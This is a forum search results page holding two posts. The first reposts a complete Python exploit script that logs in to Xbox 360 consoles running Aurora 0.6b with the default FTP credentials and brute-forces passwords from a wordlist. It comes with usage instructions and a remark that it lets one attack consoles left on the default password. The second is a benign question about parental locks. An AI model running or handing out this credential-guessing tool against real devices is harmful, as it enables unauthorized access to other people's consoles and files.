Search the Community
Showing results for tags 'security'.
Found 2 results
-
# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce # Date: 20/12/2017 # Exploit Author: Daniel Godoy # Vendor Homepage: http://phoenix.xboxunity.net/#/news # Tested on: XBOX 360 # GREETZ: Iker Legorreta, #RemoteExecution Team #!/usr/bin/env python # -*- coding:utf-8 -*- __author__ = 'Daniel Godoy' import argparse import sys from ftplib import FTP info = ''' XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n Usage: ./xbox_ftp_brute_forcer.py [options]\n Options: -t, --target <hostname/ip> | Target\n -u, --user <user> | User\n -w, --wordlist <filename> | Wordlist\n -h, --help <help> | print help\n Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt ''' def help(): print info sys.exit(0) def check_default_login(target): try: ftp = FTP(target) ftp.login('xboxftp', 'xboxftp') ftp.quit() print "\n[+] Default login is open." print "\n[+] Username : xboxftp" print "\n[+] Password : xboxftp\n" ftp.quit() except: pass def ftp_login(target, username, password): try: ftp = FTP(target) ftp.login(username, password) ftp.quit() print "\n[*] Credentials have found." print "\n[*] Username : {}".format(username) print "\n[*] Password : {}".format(password) return True except: return False def brute_force(target, username, wordlist): try: wordlist = open(wordlist, "r") words = wordlist.readlines() for word in words: word = word.strip() if ftp_login(target, username, word): break except: print "\n[-] There is no such wordlist file. \n" sys.exit(0) parser = argparse.ArgumentParser() parser.add_argument("-t", "--target") parser.add_argument("-u", "--username") parser.add_argument("-w", "--wordlist") args = parser.parse_args() if not args.target or not args.username or not args.wordlist: help() sys.exit(0) target = args.target username = args.username wordlist = args.wordlist brute_force(target, username, wordlist) check_default_login(target) print "\n[-] Brute force finished. \n" a simple code that allows attacking teams that have FTP enabled with the default password. the console must have aurora 0.6b installed and have ftp enabled
-
Hello. I just finished my console today... theres something bothering me. I have a little demon in my house... "my son" i dont want my son to delete games or mess up my xbox... is there any protection for the xbox? something like lock the player in the games list or something like that? or maybe for everything(out from starting games), ask for a password. Any help will be appreciated.